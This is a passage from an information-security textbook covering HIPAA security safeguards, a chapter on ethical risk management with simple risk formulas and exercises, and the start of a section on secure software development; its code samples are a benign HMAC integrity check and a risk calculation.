A security official shall be designated as responsible for security policy and its implementation. Workers should sign confidentiality agreements and be trained in policies and procedures; workers must then follow them or face discipline. Workers must be periodically reminded of policies and security training, including creating good passwords and reporting malware and other potential concerns. Contractors must also sign confidentiality/HIPAA adherence agreements. Policies and procedures must be updated regularly to accommodate changes in the health care environment and operations, and shall be retained for 6 years after their creation or modification.


Realizing ‘Minimum Necessary’ in a computer environment translates into documenting procedures to allocate permissions (access control) to EPHI, ensuring that permissions remain appropriately minimal as job functions change, supervising EPHI access, and terminating access when employment ends. Typically, a data owner (or staff manager) allocates permissions. A disaster will likely occur sometime, and can be caused by computer equipment failure or security breaches. Guidelines must be prepared to help employees deal with both inadvertent data loss and security incidents. These incidents must be handled appropriately and fully tracked. A contingency plan should indicate how data is normally backed up, how it can be restored following system (disk) failure, and how the organization will survive with minimal or no computer availability. Testing for such an eventuality is required. While this chapter is an overview of HIPAA requirements, an appropriate implementation of Administrative Security is more fully defined in Chap. 4 on risk, Chap. 5 on business continuity, Chap. 6 regarding policy, Chap. 7 describing information security, Chap. 12 on personnel, and Chap. 13 on incident response.

19.5.2 Physical Security

Physical security is concerned with appropriate access to the health facility, to workers' workstations and to organizational media. A facility security plan protects the facility from inappropriate access and theft, and considers when and where workers and patients may be present. Facility security shall also plan for emergency/continuity access and document equipment maintenance.

To protect EPHI, appropriate access to and acceptable use of workstations can be documented within an acceptable use plan. Since EPHI will often be viewable on terminal screens, shoulder surfing can be minimized through positioning of workstations and/or use of computer terminal hoods. Workers will occasionally leave their stations; the loss of EPHI through the viewing or theft of documents, laptops, and storage media must be prevented. Protections, such as walls or locked rooms, can minimize exposure.

EPHI may be exposed via sensitive paper documents, computers, terminals, backup copies, copy machines, and any other storage media used. Storage media containing EPHI will eventually leave the facility, via disk backup, repair, reuse or disposal. Sensitive situations to consider include the handling of patients/visitors, the removal of equipment's sensitive storage before repair, and the erasure or destruction of storage before equipment reuse or disposal. Finally, any hardware/media movement must be tracked and documented. Chapter 9 explores physical security in more depth.


19.5.3 Technical Controls

Technical controls ensure that computer equipment is accessed only by authorized individuals, and that EPHI is protected for confidentiality and integrity. Authentication controls require that each user has a unique login, that the user is identified accurately (through multi-factor authentication or secure passwords), and that terminals time out after a period of inactivity, requiring re-login. Users are also accountable for their access to EPHI through transaction logging. Any emergency access methods should be well controlled.

Computers containing EPHI must meet confidentiality and integrity goals for EPHI storage, archival and transmission. This is achieved using encryption and integrity (message digest) controls on the EPHI. Potential attacks must also be logged. Regular maintenance includes patching of system software and applications, and log review. Issues include determining which devices' logs should be monitored, which log entries may indicate potential attack and how such attacks should be handled, and which logs should be archived for security purposes. Technical controls are further explained in Chap. 7 on data security and Chap. 8 on network security.
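A message digest control can be illustrated with a keyed hash: if stored or transmitted EPHI is altered, the digest no longer verifies. The Python sketch below uses the standard hmac and hashlib modules; the key handling and record format are hypothetical simplifications (a real key would live in a protected key store, not in source code).

    import hashlib
    import hmac

    SECRET_KEY = b"replace-with-a-protected-key"   # hypothetical; store in a key vault

    def protect(record_bytes: bytes) -> str:
        """Compute a keyed digest so unauthorized alteration of stored or
        transmitted EPHI can be detected."""
        return hmac.new(SECRET_KEY, record_bytes, hashlib.sha256).hexdigest()

    def verify(record_bytes: bytes, stored_digest: str) -> bool:
        return hmac.compare_digest(protect(record_bytes), stored_digest)

    record = b'{"patient": "MRN-88231", "rx": "albuterol"}'
    tag = protect(record)
    assert verify(record, tag)
    assert not verify(record + b"tampered", tag)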

19.6 Recent and Proposed Changes in Regulation

While HIPAA/HITECH has been relatively stable for nearly a decade, some changes have recently been implemented or are in process [9]. The HIPAA Safe Harbor Law (2021) helps to speed up breach resolution by directing HHS to review security implementations only within the year preceding the breach when calculating punitive penalties, and to decrease the duration and extent of the audit process when an organization has implemented best security practices. The Twenty-First Century Cures Act (Cures Act) of 2016 enables research to more easily access and share medical information.

Some proposed changes to HIPAA, currently in the comment period, include [9]:

• Enabling patients to inspect their PHI in person, take photographs of it, and transfer PHI to a personal health application.
• CEs must post detailed fee prices for PHI access; some access may be mandated as free.
• CEs must respond within 15 days to requests for information.
• CEs may no longer be required to collect signed forms indicating receipt of NPPs.
• CEs may provide PHI when a threat of harm is "seriously and reasonably foreseeable," and must provide PHI to other healthcare providers and plans upon patient request under the HIPAA Right of Access.


19.7 Questions and Problems

1. Vocabulary. Match each meaning with the correct word.

Security rule, Privacy rule, EPHI, Required, Addressable, Covered entity, Business associate, Medical identity theft, HITECH, HIPAA, Notice of privacy practices, Required disclosure, Permitted disclosure, Routine disclosure, Protected health information

(a) Information relating to any part of a person's name, address, phone, medical condition, treatment and bills.
(b) The aspect of HIPAA providing privacy/security requirements for all organizations working with health care, regardless of whether the health information is computerized.
(c) The aspect of HIPAA listing privacy/security requirements for computerized systems containing health information.
(d) A statement health providers must give their patients indicating patient rights.
(e) Patients are entitled to see their own medical records; in certain cases, legal guardians, parents and next of kin have access to this medical information.
(f) Patient information may be communicated to other health care providers when referred; to report births, deaths, communicable diseases and other vital statistics; and to inform schools of immunizations.
(g) An indication that a Security Rule requirement may be modified, if the rule's intention is met.
(h) Regulation requiring organizations to notify patients and HHS if a breach occurs.
(i) The HIPAA name for a health care provider, health plan organization or healthcare clearinghouse.
(j) The HIPAA name for consultant organizations, which may, e.g., process claims, transcribe records, or analyze data and bills.

2. What is part of HIPAA/HITECH? Consider the following security practices, and determine whether or not they are part of HIPAA/HITECH. If they are, which rule (Security, Privacy, Notification) applies? If the Security Rule applies, which aspect: Administrative, Physical, or Technical security?

(a) A doctor should have a clear desk policy.
(b) Computerized transactions which access patient records must be logged.
(c) Patients are entitled to private rooms in a hospital.
(d) If a breach of PHI/EPHI does occur, each affected patient should be notified.
(e) PHI must be kept either in a locked room or in a locked cabinet.
(f) Employees who divulge PHI are subject to dismissal.


(g) A person should be designated as a chief of security to ensure the safety of EPHI.
(h) Logs must be monitored on a regular basis.
(i) An organization may be required to pay a maximum penalty of $1 million for a breach.
(j) There should be an incident response plan describing how to handle a hacker attack.

3. Notice of Privacy Practices. Find a Notice of Privacy Practices for one of your doctors or a hospital near you. You may find it online or obtain a paper copy onsite. Summarize what the NPP says and how it protects you.

4. Audit. Develop an audit engagement plan to address two of HIPAA's technical requirements. Consider verifying not only documented policy, but also implementation. An example audit engagement plan is shown in Table 15.2.

19.7.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study, Security Workbook and Requirements Document should be provided by your instructor or can be found at https://sn.pub/lecturer-material.

Case study | Health First case study | Other resources
Fraud: Combating social engineering | √ | HIPAA slides or notes
Security program development: Editing a policy manual for HIPAA | √ | HIPAA slides or notes; Security Workbook
HIPAA: Including Privacy Rule adherence in the requirements document | √ | HIPAA slides or notes; Requirements Document
Application controls: Extending requirements preparation by planning for the HIPAA Security Rule | √ | HIPAA slides or notes; Requirements Document

References

1. Pino LJ (2022) Eleven enforcement actions uphold patients' rights under HIPAA, July 15, 2022. Health and Human Services (HHS). https://www.hhs.gov/about/news/2022/07/15/eleven-enforcement-actions-uphold-patients-rights-under-hipaa.html
2. Kempfert AE, Reed BD (2011) Health care reform in the United States: HITECH act and HIPAA privacy, security, and enforcement issues. FDCC Q 61(3):240–273
3. Dalgleish C (2009) Course: HIPAA compliance. Triton College, River Grove
4. Grama JL (2015) Legal issues in information security, 2nd edn. Jones & Bartlett Learning, Burlington, pp 148–187
5. Dowell MA (2012) HIPAA privacy and security HITECH act enforcement actions begin. Employee Benefit Plan Rev 66:9–11
6. Schmitt R (2014) Inside the medicare strike force. AARP Bull 55(9):10–12


7. HHS (2013) HIPAA administrative simplification regulation text. U.S. Department of Health and Human Services Office for Civil Rights, March 2013, pp 59–115. https://www.hhs.gov/sites/default/files/hipaa-simplification-201303.pdf
8. HIPAA Journal (2022a) What is the HITECH act? HIPAA J. https://www.hipaajournal.com/what-is-the-hitech-act/
9. HIPAA Journal (2022b) New HIPAA regulations in 2022. HIPAA J. https://www.hipaajournal.com/new-hipaa-regulations
10. IBM (2022) Cost of a data breach report 2022. IBM Security, Armonk
11. Symantec (2014) Internet security threat report 2014, vol 19. Symantec Corp., Mountain View, April 2014
12. Bitglass (2014) The 2014 Bitglass healthcare breach report. http://pages.bitglass.com/pr2014-healthcare-breach-report.html. Accessed 8 Nov 2014

Chapter 20

Maturing Ethical Risk

The market loves to reward corporations for risk-taking when those risks are largely borne by other parties, like taxpayers. This is known as “privatizing profits and socializing losses.” Standard examples include companies that are deemed “too big to fail,” which means that society as a whole pays for their bad luck or poor business decisions. – Bruce Schneier, author of 14 books and fellow at the Harvard Kennedy School [26]

The pervasive and accepted practice in cybersecurity is to evaluate risk from the organization's perspective: the organization protects itself by assessing its own risk. There may be no equivalent financial incentive to protect employees and customers. Regulation is therefore necessary to raise the cost of breaches affecting customers and employees, but companies often have undue influence on governments, preventing substantial progress in cyber-regulation. In addition, organizations may make more money by ignoring regulation, not reporting breaches, and paying regulatory fines when exposed.

We can surmise that organization-based risk assessment has been inadequate by comparing the annual number of breached records to population size. For many western nations in 2016, this rate was estimated to commonly approach 100% of the population, and occasionally exceed it [28]. Statista also tracks breached records, and documents three cases of breaches in which between 1.1 and 11 billion records were exposed [27]. We can use this rate of breaches as a societal metric of the awareness, attention and interest (or lack thereof) in cybersecurity.

Furthermore, for high-cost, low-probability risk, risk methodology recommends that insurance be purchased. However, insurance offers no preventive or detective controls, only corrective ones. Using the example of school shootings in the U.S., traditional risk analysis provides inadequate financial incentive to protect school children [1]. Cyber-insurance, while necessary, can likewise detract from implementing controls.

On the positive side, data privacy has introduced risk evaluation at the individual level, broadening risk from its sole organizational focus. It can be argued that to understand even organizational risk well, one must also understand risk at the personal (e.g., customer) and societal levels: one would quantify risk at the personal level to better understand liability, and at the societal level to better understand trends, and both to act as a better citizen in the world.


20.1 Important Concepts

It is important to understand what ethics is and what it is not. Ethics is not self-serving. Some basic ethical principles that have guided people include:

Consequentialism or Utilitarianism  An action is right if it fosters the greatest happiness for the greatest number [35]. Socially responsible actions are those that improve the welfare of society at large.

Virtue Ethics  The character of an entity is of greatest concern [2]. A good character avoids vice. Virtue ethics focuses on internal motivation and asks that we do the right thing, in the right way, for the right reason. One way to select such an action is with respect to a revered person: what would Jesus/Mohammed/Buddha do? Virtue ethics may also extend to the organizational level, by improving internal organizational qualities [3].

Deontological Ethics  A simplification of this philosophy follows the golden rule: do unto others as you would have them do unto you. Universal applicability also matters: if everyone took this action, would society benefit [4]? For example, lying and stealing cannot be universally applied to good effect; therefore, these actions are not recommended. Chakrabarty and Bass [3] point out that deontology may advocate institutional rules that make an organization function well, but lead to organizational actions that do not benefit society.

20.2 Raising Ethical Maturity through an Ethical Risk Framework

This chapter considers research on developing processes for ethical risk. These processes are presented in likely order of ethical maturity, expanding from self-serving concerns, to compliance concerns, to stakeholder concerns.

20.2.1 Raising Self-centered Ethical Concern

It is debatable whether self-centered and ethical behavior are compatible concepts. However, it is important in an organization that employees do not steal from it. It is also important that employees can have productive conversations about protecting the organization from risk.


20.2.1.1 Open Communication

Management can shut down serious risk analysis by avoiding the topic, or by avoiding discussion of specific risks deemed insufficiently important [6]. Management may also dismiss ethical issues or bad news disrespectfully, thereby losing an opportunity to build better relationships with, and loyalty from, employees. Employees can persistently ask questions: "what should we do if risk X occurs?"

Employees can also fail to communicate risk to management. It is very easy to attribute a breach or security incident to "a firewall (or technical) issue," when what could have been described is the difference in security between an older-style firewall and a more capable one [11]. Technical employees must learn to discuss issues in business terms. For example, what risk scenarios might occur with the older firewall that would not occur with the newer one, and how might that affect the business financially? Management always has the prerogative of not funding a risk after a discussion, but if they do not listen to employees who raise concerns, they do not consider the full picture.

Rank-and-file employees may find it difficult when their main concerns are not funded. However, in business, a RACI chart diagrams who is Responsible, Accountable, Consulted and Informed in an organization [7]. Risk practitioners are Responsible for gathering risk data and writing a risk report, but senior management is Accountable for prioritizing risk and deciding on risk controls. After employees have done their best job in documenting and distributing risk reports, and asking for sign-offs, they should not feel accountable for the results. The one exception is when laws are broken or serious harm may occur. The ACM Code of Ethics recommends escalating dangerous risks, after double-checking facts. The text Ethics in Information Technology discusses legal recommendations for whistleblowing [9].

20.2.1.2 Develop a Code of Ethics

Without an ethical culture and code of ethics, the organizational level of ethics will vary based upon each employee's basic moral behavior [10]. A basic control against internal fraud is to differentiate appropriate and inappropriate behavior, both through policy and through management example [6]. Organizations can adopt a code of ethics at varying levels of ethical maturity, including the following ethical levels, which build upon each other:

• Organizational concern: the employee has fiduciary responsibilities to the organization, related to preventing fraud, theft and misuse.
• Compliance concern: the employee shall help the organization adhere to laws and safeguard contracts.
• Stakeholder concern: employees should treat fellow employees, customers, and other stakeholders fairly and honestly.
• Societal concern: employees should act as good world citizens.


20.2.1.3 Provide an Anonymous Reporting Mechanism for Ethical Violations

The Association of Certified Fraud Examiners (ACFE) [8] has found, year after year and regardless of region, that tips are by far the most common way fraud is discovered. On average, 42% of frauds are discovered through tips from employees, customers, vendors, or anonymous sources. To enhance this mechanism, make tip reporting readily available and train employees to report fraud.

20.2.2 Adhering to Regulation

While adhering to regulation is self-serving, it also recognizes the importance of getting along in society. As mentioned previously, it may be financially profitable to ignore regulation. Therefore, recognizing society's demands on an organization, and striving to operate within the law, are important at this level.

20.2.2.1 Address Regulation Fully

Organizations can choose to optimize profit over law, or to adhere to law. Within the adhering-to-law category, organizations may follow minimal legal compliance or follow the intent of the law. Minimal legal compliance meets only the bare technical minimum of the law. Fully adhering to a regulation requires evaluating new business opportunities, as well as monitoring the law and implementing the regulation appropriately organization-wide, as necessary [14]. Multinational corporations must adhere to the law in all nations in which they do business. This may best be accomplished by outlining a baseline standard organization-wide, then adding practices for countries with additional requirements. Additionally, third-party contracts must specify applicable legal requirements.

20.2.2.2 Evaluate Legal Responsibility Beyond Regulation

Civil suits arise in cases of tort law, contract law, copyright and patent law. Tort law addresses duty, breach of duty, reasonable care, product liability, punitive damages, and causation/foreseeability [13]. Information technology's general concerns include privacy, contracts, intellectual property and product liability. Defending against lawsuits requires due care, which limits risk through assessing risk and enacting controls.

Product liability should be of particular concern for decision support systems, when products automate intelligence for the criminal justice, healthcare, economic and legal systems affecting people's lives, careers and freedom [12]. Training new automated systems on traditionally biased past decisions can institutionalize prejudice, leading to justifiable lawsuits.


20.2.2.3 Manage Projects Responsibly

When projects fall behind schedule, economics may be prioritized over ethics [6], resulting in a series of poor decisions, lies and potential contract lawsuits. The project may cut corners in quality, documentation and/or features, potentially reducing safety or security [15]. Alternatively, the project may be delivered late, resulting in increased costs. Responsible project management builds upon realistic schedules, good communication, quality control, comprehensive risk management, and ethical training and policies.

20.2.3 Respecting Stakeholder Concerns

Beyond legal concerns, eventually we come to understand that repeat business and retaining good employees are often crucial to financial viability and survival. Therefore, treating stakeholders with respect, and valuing their business and loyalty, are worthy concerns. To accomplish that, organizations truly need to produce products customers want to buy and/or provide decent service [21].

20.2.3.1 Personalize Risk

People tend to have a more ethical view of risk, compared to the statistical perspective of risk practitioners. Therefore, it is useful for risk practitioners and businesses to consider the ethical perspectives of risk, putting themselves in a failed risk scenario. For example, riggers who packed parachutes for the US Army's 82nd Airborne Division had to jump from planes with their fellow soldiers, wearing randomly assigned parachutes [16].

One way to personalize risk is to calculate risk from the customer's or employee's perspective. Normally, risk is calculated from the organization's perspective, as the impact times the likelihood. To personalize risk, one calculates risk from the stakeholder's perspective [18]:

Risk_customer = Impact_customer × Likelihood_customer

Risk that may be deemed particularly unethical includes risks with multiple of these characteristics: exotic, catastrophic, memorable, unfair, not controllable by an individual, and originating from an untrustworthy source [20]. In these cases, an outrage factor is added to the risk equation:

Risk = Impact × Likelihood × Outrage
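These perspective-based calculations are easy to make concrete. The Python sketch below contrasts organizational, customer, and outrage-adjusted views of the same hypothetical breach; all dollar figures and probabilities are invented for illustration.

    def risk(impact: float, likelihood: float, outrage: float = 1.0) -> float:
        """Annualized risk = impact x likelihood, optionally scaled by outrage."""
        return impact * likelihood * outrage

    # Hypothetical breach scenario, valued from two perspectives: the organization
    # sees regulatory fines; each customer sees identity-theft recovery costs.
    org_risk      = risk(impact=1_500_000, likelihood=0.05)   # $75,000/yr to the organization
    customer_risk = risk(impact=1_300,     likelihood=0.05)   # $65/yr per customer
    # For a memorable, unfair event, an outrage multiplier raises perceived risk.
    outraged      = risk(impact=1_300, likelihood=0.05, outrage=3.0)
    print(org_risk, customer_risk, outraged)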

Furthermore, there is a financial gap between the value people place on their own lives and the value risk management traditionally assigns to a life. Traditional estimates consider a person's earning value to the end of their life, which further minimizes their value in low-income nations [17]. Ethical risk management uses higher values for the value of life; but even then, risk estimates may be too low, as in the example of school shootings, where a very low likelihood leads to a low Annual Loss Expectancy [1].

Considering privacy (using the Information Privacy chapter) initiates the process for one aspect of stakeholder protection. Other controls for ethical risk include involving members of the public in risk decisions, to represent the 'speaker for the absent' [16]. Representative employees should also be involved in risk decisions and serve on business boards, empowered with pertinent information and the power to negotiate [19]. Ethical risk analysis uses a higher and consistent value of life. Finally, communications can better inform the public, emphasizing what the public does not understand well: technology and statistical realities [20].

20.2.4 Addressing Societal Concerns Simplistically stated, ethics is concerned with increasing overall happiness (consequentialism), acting in the right way (virtue ethics) and/or with the right motivation, out of duty (deontology). At this level, a concern for the society and the world is

20.2  Raising Ethical Maturity through an Ethical Risk Framework

373

At this level, a concern for society and the world is considered, including for marginalized parts of society and the environment. Taking a broader view of business opportunities and risks leads to a better understanding of the future and may reveal prospects for new ideas, services and products.

20.2.4.1 Think Outside the Engineer Role

Engineers often focus only on technology implementations and do not consider the societal implications of their software. This becomes an issue when a recently launched technology enjoys rapid, worldwide adoption but could cause regional or planetary-scale disasters through climate change, nuclear weapons, biological pathogens, malware, and more [23]. There may be implications that are legal, economic, or environmental, or that relate to privacy, safety, misuse, and people's jobs and lives. Therefore, engineers must discuss the ethical implications of their work among themselves, with their management, and with customers. A fun method to raise awareness is Friedman and Hendry's Envisioning Cards [33], which ask questions on topics such as a technology's international effects, political impacts, and effects on children, the environment, stakeholders and nonusers. Engineers should address undesirable decisions, such as, when a disaster does happen, how to minimize loss of life and whose life would be spared [34]. Once the societal implications are understood, it is beneficial to actually calculate societal risk quantitatively [18]. This risk calculation may be particularly useful for larger issues, where the organization or new technology may have a considerable impact:

Risk_society = Impact_society × Likelihood_society





20.2.4.2 Inform Customers of Safety and Security Concerns

Customers (whether internal or external) may need to be informed of safety, security, and ethical concerns. A quantitative risk assessment, focused on the stakeholder, can best inform them of what they should be concerned about. This safety consideration is common in the engineering world and could be matured in the IT world. Expressing risk concerns can raise the stature of the software development organization with its customers, increase the value of projects, and lower the risk of product liability. At best, organizations can choose their customers (in addition to employees and third-party vendors [6]). At worst, risky liability should be explicitly accepted by the customer. It is also possible to certify products or organizations, using, for example, Common Criteria, PCI DSS, and ISO 9000.


20.2.4.3 Evaluate Unknown Risk

The Precautionary Principle [29] suggests addressing technology and scientific risk by catching problems before they arise (pre-damage) as opposed to afterwards (post-damage). It is recommended to apply this principle to plausibly unacceptable hazards, using scientific analysis, and to evaluate the risk at a national level to determine what might be an acceptable level of risk. Such analyses should be written up systematically, potentially using a Social Impact Analysis or Environmental Impact Analysis. Appropriate steps include: (1) screening the project; (2) considering alternative solutions; (3) predicting impact; and (4) reducing undesirable impact via mitigation strategies [25]. The document might include the following sections [24]:

• Summary: describes the controversial issues, problems and major conclusions;
• Purpose: defines the proposed project and the goals it hopes to achieve;
• Alternatives: evaluates alternative solutions that can accomplish the goals;
• Affected Environment: describes areas and issues affected by the alternative solutions;
• Consequences: considers both negative and positive, direct and indirect effects and implications of alternative solutions.

20.3 Questions

1. Values Envisioning: Consider two of the following scenarios, with their effects on the world. Discuss how they may affect different groups, including: children, international nations, indirect stakeholders/non-users, the political landscape, and society/environment.
   (a) Drone delivery services
   (b) Automatically-driven personal planes
   (c) Pollution monitoring devices for waterways or natural gas wells
   (d) Chemical-tracking processors installed in brains
   (e) Automated paper grading
2. Case Study: Consider an organization you currently work in or would like to work in. Assume the organization is in your geographical region. What risks involving the organization might be a concern to the public that management may not be as concerned with?
3. Ethical Line Drawings: A company is considering how it might be possible to develop the project discussed in question 1 or 2. What trade-offs of concern should the project consider? Consider:
   (a) What values should be evaluated? Consider 3–5 values for the selected project.
   (b) Draw an ethical line drawing for each value, labeling each endpoint. Place an arrow where you believe the value lies for the project, with no controls.


   (c) Briefly describe controls that can move a value point in a positive direction. Add a new arrow on the ethical line drawing, which considers the addition of the control(s).
4. Envisioning Three Levels of Risk: Evaluate how views of risk may differ between a corporation, a corporation's customer, and the nation. How might each experience the risk differently? What risk scenarios (or risk stories) might each group tell? Select one of the following scenarios to analyze:
   (a) Health insurance breach
   (b) Electric company affected by information warfare
   (c) A project or risk from question 1 or 2.
5. Ethical Theory Evaluation: Using a project described in question 1 or 2, prepare ethical arguments for additional controls or restricted features. Prepare your arguments using the ethical theories of virtue ethics, deontological ethics, and consequentialism-utilitarianism, labeling each argument with its associated theory.
6. Code of Ethics: Below are selected excerpts from professional organizations' codes of ethics. Label which statements apply to the self-centered, regulation-adhering, stakeholder-respecting or societal concerns aspects of a Code of Ethics document.
   (a) Ensure that the public good is the central concern during all professional computing work. –ACM Code of Ethics and Professional Conduct, Principle 3.1 [30]
   (b) Strive to achieve high quality in both the processes and products of professional work. –ACM Code of Ethics and Professional Conduct, Principle 2.1 [30]
   (c) to improve the understanding by individuals and society of the capabilities and societal implications of conventional and emerging technologies, including intelligent systems; –IEEE Code of Ethics, Principle 2 [32]
   (d) to avoid unlawful conduct in professional activities and to reject bribery in all its forms; –IEEE Code of Ethics, Principle 4 [32]
   (e) Support the implementation of, and encourage compliance with, appropriate standards and procedures for the effective governance and management of enterprise information systems and technology, including: audit, control, security and risk management. –ISACA Code of Professional Ethics, Principle 1 [36]
   (f) Inform appropriate parties of the results of work performed, including the disclosure of all significant facts known to them that, if not disclosed, may distort the reporting of the results. –ISACA Code of Professional Ethics, Principle 6 [36]
   (g) A member should also consult the following, if applicable [31]:
      • The ethical requirements of the member's state CPA society and authoritative regulatory bodies such as state board(s) of accountancy


      • The Securities and Exchange Commission (SEC)
      • The Public Company Accounting Oversight Board (PCAOB)
      • The Government Accountability Office (GAO)
      • The Department of Labor (DOL)
      • Federal, state and local taxing authorities
      –AICPA Code of Professional Conduct 0.100.020 [31]

References

1. Lincke SJ, Kahn F (2019) Ethical management of risk: active shooters in higher education. J Risk Res 23:1562–1576
2. Aristotle, Irwin T (1985) Nicomachean ethics. Hackett Pub. Co., Indianapolis
3. Chakrabarty S, Erin Bass A (2015) Comparing virtue, consequentialist, and deontological ethics-based corporate social responsibility: mitigating microfinance risk in institutional voids. J Bus Ethics 126:487–512
4. Kant I, Gregor MJ (1998) Groundwork of the metaphysics of morals. Cambridge texts in the history of philosophy. Cambridge University Press, Cambridge, U.K./New York
5. Van de Poel I (2018) Design for change. Ethics and Information Technology, 26 June 2018. https://doi.org/10.1007/s10676-018-9461-9
6. Ames III OK (2018) The ethical responsibility of leaders to create ethically healthy organizations. Southern Law J XXVIII:261–310
7. ISACA (2015) CRISC review manual, 6th edn. ISACA, Rolling Meadows, p 41
8. ACFE (2020) Report to the nations: 2020 global study on occupational fraud and abuse. Association of Certified Fraud Examiners. Retrieved 6 Aug 2020 from: https://www.acfe.com/report-to-the-nations/2020
9. Reynolds GW (2018) Ethics in information technology, 6th edn. Cengage, Boston
10. Rossi CL (2010) Compliance: an over-looked business strategy. Int J Soc Econ 37(10):816–831, Emerald Group Publishing Ltd
11. Schuman E (2020) Rethinking cyber risk. SC Magazine, 1 May 2020. From: https://www.scmagazine.com/home/security-news/features/rethinking-cyber-risk
12. Altman M, Wood A, Vayena E (2018) A harm-reduction framework for algorithmic fairness. IEEE Security & Privacy, May/June 2018, pp 34–45
13. Cheng EK (2017) Torts. Law School for Everyone, The Great Courses, Chantilly, pp 282–371
14. ISACA (2018) CRISC practice question database. ISACA, Rolling Meadows
15. Berenbach B, Broy M (2009) Professional and ethical dilemmas in software engineering. IEEE Comput 42:74–80
16. Bodde DL (2014) Ethics and the allocation of risk in engineering design. In: 2014 IEEE International Symposium on Ethics in Science, Technology and Engineering, pp 1–6
17. Kahn S (1986) Economic estimates of the value of life. IEEE Technology and Society Magazine, June 1986
18. Lincke SJ, Adavi M (2019) Modeling security risk with three views. 2019 Spring Simulation Conference, Society for Modeling and Simulation International (SCS), published in IEEE and ACM, 29 Apr 2019, Tucson, AZ, pp 1–12
19. OECD (2015) G20/OECD principles of corporate governance. Organisation for Economic Co-operation and Development (OECD), pp 38–39
20. Sandman PM (1987) The Peter Sandman risk communication website. U.S. Environ Protect Agency J, Nov 1987, pp 21–22
21. Freeman RE, Harrison JS, Wicks AC (2007) Managing for stakeholders: survival, reputation, and success. Yale University Press


22. Gotterbarn D, Wolf MJ (2020) Leveraging the ACM code of ethics against ethical snake oil and dodgy development (webcast), 8 June 2020. Association for Computing Machinery
23. Green BP (2014) Are science, technology, and engineering now the most important subjects for ethics? Our need to respond. 2014 IEEE International Symposium on Ethics in Science, Technology and Engineering, pp 1–7
24. EPA (1978) Environmental impact statement. National Environmental Policy Act Review Process. Retrieved Sept 2018 from www.epa.gov/nepa/national-environmental-policy-act-review-process
25. Taebi B, Correlje A, Cuppen E, van de Grift E, Pesch U (2016) Ethics and impact assessments of large energy projects. 2016 IEEE International Symposium on Ethics in Engineering, Science and Technology (ETHICS), IEEE Digital Library, pp 1–5
26. Schneier B (2021) Why was SolarWinds so vulnerable to a hack? It's the economy, stupid. NY Times, 23 Feb 2021. https://www.nytimes.com/2021/02/23/opinion/solarwinds-hack.html?searchResultPosition=9
27. Petrosyan A (2023) Annual number of data compromises and individuals impacted in the United States from 2005 to 2022. Statista, 24 Feb 2023. From: https://www.statista.com/statistics/273550/data-breaches-recorded-in-the-united-states-by-number-of-breaches-and-records-exposed/
28. Symantec (2017) Internet security threat report, Apr 2017, vol 22
29. UNESCO (2005) The Precautionary Principle. World Commission on the Ethics of Scientific Knowledge and Technology (COMEST), United Nations Educational, Scientific and Cultural Organization. Retrieved 9 June 2016 from: http://unesdoc.unesco.org/images/0013/001395/139578e.pdf
30. ACM (2018) ACM Code of Ethics and Professional Conduct. Association for Computing Machinery, New York, NY, USA
31. AICPA (2016) AICPA Code of Professional Conduct. American Institute of Certified Public Accountants, Inc. https://us.aicpa.org/
32. IEEE (2020) Code of Ethics. Institute of Electrical and Electronics Engineers, June 2020
33. Friedman B, Hendry DG (2012) The Envisioning Cards: a toolkit for catalyzing humanistic and technical imaginations. Human Factors in Computing (CHI'12), 5–10 May 2012, Austin, Texas, USA, ACM SIGCHI, pp 1145–1148
34. Johnsen A, Dodig-Crnkovic G, Lundqvist K, Hänninen K, Pettersson P (2017) Risk-based decision-making fallacies: why present functional safety standards are not enough. 2017 IEEE International Conference on Software Architecture Workshops, pp 153–160
35. Mill JS, Crisp R (1998) Utilitarianism. Oxford Philosophical Texts. Oxford University Press, Oxford/New York
36. ISACA (n.d.) Code of Professional Ethics. ISACA, Arlington Heights, IL, USA. Taken from: https://www.isaca.org/credentialing/code-of-professional-ethics, 18 March 2023

Part VI

Developing Secure Software

This special section is intended to help software engineers understand their role in the security story. As new applications are written daily, this new code has not yet been exposed to the decades of attacks that system software has weathered. Therefore, it becomes necessary for all software developers to train in secure programming. Regulation in Europe and Canada, as well as international and industry standards, requires that security and privacy be built into the software, not added at the end. It is assumed that the reader is knowledgeable in programming and testing before reading this section. This section is divided into three chapters. Before designing for security, it is important to consider risk. Therefore, Chapter 21 introduces software attacks and vulnerabilities that software engineers must carefully consider mitigating. Chapter 22 addresses the secure software development process, including policy, threat management, configuration management and patching. Chapter 23 outlines engineering techniques for requirements specification and design features for security. These topics are addressed by considering current standards developed and used in industry, including OWASP's Top 10 most critical web security risks, the Building Security In Maturity Model (BSIMM), and a standard required in the payment card industry, the Software Security Framework.

Chapter 21

Understanding Software Threats and Vulnerabilities

The world soon learned just how neglected OpenSSL had become. The code played a critical role in securing millions of systems, and yet it was maintained by a single engineer working on a shoestring annual budget of $2,000 – most of that donations from individuals – just enough to cover the electric bills. The Heartbleed bug had been introduced in a software update two years earlier and yet, nobody had bothered to notice it.  – Nicole Perlroth (2020, p. 303), author of This Is How They Tell Me the World Ends, writing about how OpenSSL was commonly used by Facebook, the FBI, the Pentagon, Wi-Fi routers, Amazon, Android phones, etc. to encrypt internet traffic [1]

The first step in developing secure software is risk analysis, which requires an understanding of threat analysis. While attacks addressed earlier in this book certainly apply to software as well, this chapter addresses the threats and vulnerabilities specific to software. Some software attacks are introduced or explained more fully, including buffer overflow, integer/floating point overflows, SQL injection and OS command injection, directory traversal, race conditions, abuse of direct object references, and network sniffing or other breaches of confidential data arising from insecure software. The Building Security In Maturity Model (BSIMM) requires mature organizations to identify potential attackers and attacks specific to the technologies used, such as programming languages and system software. Gathering attack intelligence includes tracking and acting on recent CERT-reported attacks. Generated attack patterns and abuse cases should then be disseminated internally, prioritized and published [9]. We must consider threats not only at the high level, but at the deeper technical level. If a suit of armor protects a knight's attack surface (by covering nearly his entire body), how can our program also be completely protected? An attack surface analysis considers where newly arising vulnerabilities may lie that have not already been considered. Attack surface minimization considers how features may be turned off, wherever possible, as part of a least privilege implementation [11]. As part of this, error or exception handling must also be carefully designed.


21.1 Important Concepts and Goals

When authentication and access control are not implemented properly, attacks become possible; indeed, most attacks can be characterized as unauthorized persons gaining access beyond their permissions. Therefore, here we describe three important design functions related to authorization.

Least Privilege  In the software world, least privilege gives the program and the user the minimum required privileges at the time of execution [10, 18]. For example, if a highly privileged operation must be performed, then this privilege shall not be granted for the entire connection, but only for the single high-privilege operation. Linux's 'sudo' command grants users temporary privileges to perform an administrative task, minimizing the duration of such privileges. Least privilege is further explained in the chapters on Fraud and Information Security.

